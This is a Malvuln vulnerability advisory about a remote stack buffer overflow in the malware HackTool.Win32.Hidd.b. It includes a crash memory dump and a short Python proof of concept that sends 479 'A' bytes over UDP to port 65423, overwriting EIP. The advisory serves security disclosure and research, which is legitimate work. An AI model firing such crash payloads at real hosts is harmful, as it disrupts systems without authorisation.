Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/665a408981294ca49be23096363eec2f.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: HackTool.Win32.Hidd.b Vulnerability: Remote Stack Buffer Overflow (UDP Datagram) Description: The malware listens on UDP ports 52810 and 65423. Third-party attackers who can reach an infected system can send a 479 byte payload to port 65423 and trigger a classic stack buffer overflow overwriting the EIP, ECX registers. Type: PE32 MD5: 665a408981294ca49be23096363eec2f Vuln ID: MVID-2021-0318 ASLR: False DEP: False Safe SEH: True Disclosure: 08/11/2021 Memory Dump: EAX : 00000000 EBX : 00000000 ECX : 41414141 EDX : 77AC9D70 ntdll.77AC9D70 EBP : 000A12D8 ESP : 000A12B8 ESI : 00000000 EDI : 00000000 EIP : 41414141 EFLAGS : 00010246 ZF : 1 OF : 0 CF : 0 PF : 1 SF : 0 TF : 0 L'Ā' AF : 0 L'Ā' DF : 0 IF : 1 LastError : 00000000 (ERROR_SUCCESS) LastStatus : 00000000 (STATUS_SUCCESS) GS : 002B athl_dump_scy.53002B ES : 002B CS : 0023 FS : 0053 DS : 002B SS : 002B '+' dumpchk -y c:\symbols "c:\dump\athl.exe.604.dmp". Total memory: 684e000 Stream 3: type MemoryInfoListStream (16), size 00008080, RVA 0000A8EE Stream 4: type ExceptionStream (6), size 000000A8, RVA 0000066C ThreadID 5056 ExceptionCode C0000005 ExceptionRecord 0 ExceptionAddress 41414141 Context record RVA 4194, size 2cc Stream 5: type SystemInfoStream (7), size 00000038, RVA 000000E0 ProcessorArchitecture 0000 (PROCESSOR_ARCHITECTURE_INTEL) ProcessorLevel 0006 ProcessorRevision 9E09 NumberOfProcessors 01 MajorVersion 0000000A MinorVersion 00000000 BuildNumber 00003FAB (16299) PlatformId 00000002 (VER_PLATFORM_WIN32_NT) CSDVersionRva 00002A94 Length: 0 Product: WinNt, suite: SingleUserTS Exploit/PoC: from socket import * MALWARE_HOST="x.x.x.x" PORT=65423 s=socket(AF_INET, SOCK_DGRAM) s.connect((MALWARE_HOST, PORT)) PAYLOAD="A"*479 s.send(PAYLOAD) s.close() print("HackTool.Win32.Hidd.b / Remote Stack Buffer Overflow (UDP Datagram)") print("MD5: 665a408981294ca49be23096363eec2f") print("By Malvuln") Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).